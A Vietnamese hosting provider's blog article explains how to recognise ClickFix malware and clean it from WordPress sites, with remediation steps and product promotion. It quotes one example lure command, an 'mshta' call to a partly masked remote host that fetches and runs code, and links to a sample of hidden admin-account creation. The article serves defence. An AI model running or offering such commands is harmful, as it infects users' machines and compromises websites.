giftbox

Danh mục

Tìm kiếm
/

Mục lục

Không có mục lục
Tham gia kênh Telegram của CloudFly để nhận thêm ưu đãi và không bỏ lỡ bất kỳ khuyến mãi nào từ CloudFly
Tham gia ngay

Hướng Dẫn Cách Khắc Phục Khi Dính Mã Độc ClickFix

  • 4 Thg 04 2025

Mã độc ClickFix đang trở thành mối đe dọa nghiêm trọng đối với các website, đặc biệt là những trang sử dụng WordPress. Trong bài viết này, CloudFly sẽ hướng dẫn bạn chi tiết cách khắc phục khi dính mã độc ClickFix. Hãy làm theo các bước dưới đây để loại bỏ hoàn toàn mã độc và tăng cường bảo mật cho website của bạn!

hướng dẫn cách khắc phục khi dính mã độc clickfix

1. Các dấu hiệu nhận biết mã độc ClickFix là gì?

Mã độc ClickFix là một dạng phần mềm độc hại tinh vi, chủ yếu được thiết kế để khai thác lỗ hổng bảo mật và thực hiện các hành động gây hại mà người dùng không nhận ra. Dưới đây là một số dấu hiệu nhận biết mã độc ClickFix:

1.1. Trình duyệt hoạt động bất thường

  • Các tab hoặc cửa sổ trình duyệt mở ra tự động mà bạn không kích hoạt.
  • Trang web lạ hoặc trang giả mạo xuất hiện mà bạn chưa từng truy cập.
  • Các quảng cáo pop-up xuất hiện bất ngờ và liên tục, dù bạn đã tắt hoặc hạn chế chúng trong cài đặt.

1.2. Hiệu suất máy tính giảm sút

  • Máy tính trở nên chậm chạp hoặc treo liên tục khi sử dụng các ứng dụng thông thường.
  • CPU hoặc RAM sử dụng cao bất thường, ngay cả khi bạn không làm gì nhiều trên máy tính.
  • Ứng dụng hoặc chương trình tự động mở lên mà không có sự can thiệp của bạn.

1.3. Cảnh báo từ phần mềm diệt virus

  • Phần mềm diệt virus hoặc tường lửa của bạn phát hiện và cảnh báo về hành động đáng ngờ hoặc mã độc trong hệ thống.
  • Phần mềm diệt virus không thể cập nhật hoặc bị tắt mà bạn không biết lý do.

1.4. Các chương trình hoặc tệp không rõ nguồn gốc xuất hiện

  • Các ứng dụng hoặc tệp không mong muốn xuất hiện trong danh sách chương trình hoặc trên màn hình desktop mà bạn không cài đặt.
  • Các tệp hệ thống hoặc ứng dụng bị thay đổi hoặc không thể mở được.

1.5. Tài khoản trực tuyến bị xâm nhập

  • Các tài khoản của bạn (email, mạng xã hội, ngân hàng) bị truy cập mà bạn không thực hiện.
  • Bạn nhận được các thông báo về các hoạt động bất thường, như đăng nhập từ địa chỉ IP lạ hoặc các giao dịch chưa được thực hiện.

1.6. Mã độc ClickFix khiến các cài đặt bị thay đổi

  • Các cài đặt hệ thống hoặc trình duyệt bị thay đổi mà bạn không thực hiện, như thay đổi trang chủ hoặc công cụ tìm kiếm mặc định.
  • Các thiết lập bảo mật bị tắt hoặc thay đổi mà bạn không biết lý do.

Nếu bạn nhận thấy một trong những dấu hiệu trên, hãy khắc phục ngay lập tức để ngừng mã độc và bảo vệ dữ liệu cá nhân của mình.

2. Hướng dẫn cách khắc phục khi dính mã độc ClickFix

2.1. Cách ngăn chặn mã độc ClickFix thực thi trên website

Mã độc ClickFix có thể chèn một lớp giả mạo CloudFlare để đánh lừa người dùng chạy lệnh trên máy tính thông qua hộp thoại Run hoặc Powershell.
Ví dụ:

mshta http://ok.*******.us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S"
hoặc

hướng dẫn cách khắc phục khi dính mã độc clickfix 1

Các mã thực thi này thường được mã hóa phức tạp bằng eval() để tránh bị phát hiện. Một phương án hiệu quả là override lại function này để giám sát và ngăn chặn mã độc thực thi. Bạn có thể tham khảo mã sau:

https://gist.github.com/vvthien/98bde58e2c6a131f719511f3e6efda5b 

Bạn chỉ cần copy và dán đoạn mã trên vào thẻ <head> của website để ngăn chặn ClickFix thực thi lệnh, gây ảnh hưởng đến người dùng truy cập website.

2.2. Cách khắc phục website đã nhiễm ClickFix

Nếu website đã bị nhiễm mã độc, bạn hãy thực hiện ngay các bước sau để loại bỏ và bảo vệ hệ thống:

  • Ngăn chặn mã độc tiếp tục hoạt động: Nhúng mã bảo vệ (đã đề cập) vào website để chặn mã độc lây lan đến máy tính người dùng truy cập website.
  • Kiểm tra lại tài khoản quản trị: Kiểm tra trong table SQL vì WordPress có thể ẩn user khỏi danh sách hiển thị trong admin.
    Ví dụ mẫu về việc hoàn toàn có thể tạo tài khoản ẩn: https://gist.github.com/vvthien/ed3c246eaeab33b4bb32ccc0aa49afeb.  
  • Quét và loại bỏ mã độc: Rà soát nhật ký hệ thống (Raw Log, cPGuard, Imunify360) để xác định các file, plugin, theme bị nhiễm mã độc. Và gỡ bỏ hoặc thay thế ngay các file đáng ngờ.
  • Cô lập website bị nhiễm: Nếu có nhiều website trên cùng một hosting, bạn cần cách ly website bị nhiễm để tránh lây nhiễm chéo. Đồng thời di chuyển toàn bộ dữ liệu website sang một hosting mới. Trước khi trỏ tên miền về host mới, bạn cần thiết lập bảo vệ thư mục wp-admin và kiểm soát chặt chẽ các thư mục plugin và themes.
  • Cập nhật và bảo vệ hệ thống: Nâng cấp ngay lập tức tất cả plugin và theme lên phiên bản mới nhất để vá lỗ hổng bảo mật. 
  • Nếu hosting có hỗ trợ, bạn hãy sử dụng tính năng Secure Folder để bảo vệ các thư mục quan trọng. (Tham khảo ngay tính năng Secure Folder có trong bộ công cụ CloudFly Toolkit được tích hợp sẵn trên Cloud Hosting tùy chỉnh cấu hình của CloudFly)

hướng dẫn cách khắc phục khi dính mã độc clickfix 2


>>> Xem thêm:

Hy vọng bài viết trên trên đã giúp bạn hiểu rõ hơn về cách khắc phục khi dính mã độc ClickFix. Nếu còn thắc mắc hay muốn đăng ký Cloud Server hay Cloud Hosting tại CloudFly, hãy liên hệ ngay với chúng tôi qua thông tin bên dưới để được tư vấn và hỗ trợ chi tiết. Đội ngũ kỹ thuật có chuyên môn cao luôn sẵn sàng 24/7 để giải quyết mọi vấn đề của bạn.

THÔNG TIN LIÊN HỆ:

  • Group săn sale: https://t.me/cloudflyvn

 

Chia sẻ

Bài viết nổi bật

Tham gia kênh Telegram của CloudFly để nhận thêm ưu đãi và không bỏ lỡ bất kỳ khuyến mãi nào từ CloudFly
Tham gia ngay

Bài viết cùng chủ đề

Hướng Dẫn Cách Khắc Phục Khi Dính Mã Độc ClickFix

Hướng Dẫn Cách Khắc Phục Khi Dính Mã Độc ClickFix

Hướng Dẫn Cách Phòng Tránh Mã Độc ClickFix

Hướng Dẫn Cách Phòng Tránh Mã Độc ClickFix

ClickFix Là Gì? Tìm Hiểu Chi Tiết Về ClickFix

ClickFix Là Gì? Tìm Hiểu Chi Tiết Về ClickFix

Hướng Dẫn Kết Nối Google Analytics API Với n8n

Hướng Dẫn Kết Nối Google Analytics API Với n8n

Hướng Dẫn Kết Nối N8n Đến Google Cloud APIs

Hướng Dẫn Kết Nối N8n Đến Google Cloud APIs

Hướng Dẫn Tạo Lại Tài Khoản Đăng Nhập Quản Lý N8n

Hướng Dẫn Tạo Lại Tài Khoản Đăng Nhập Quản Lý N8n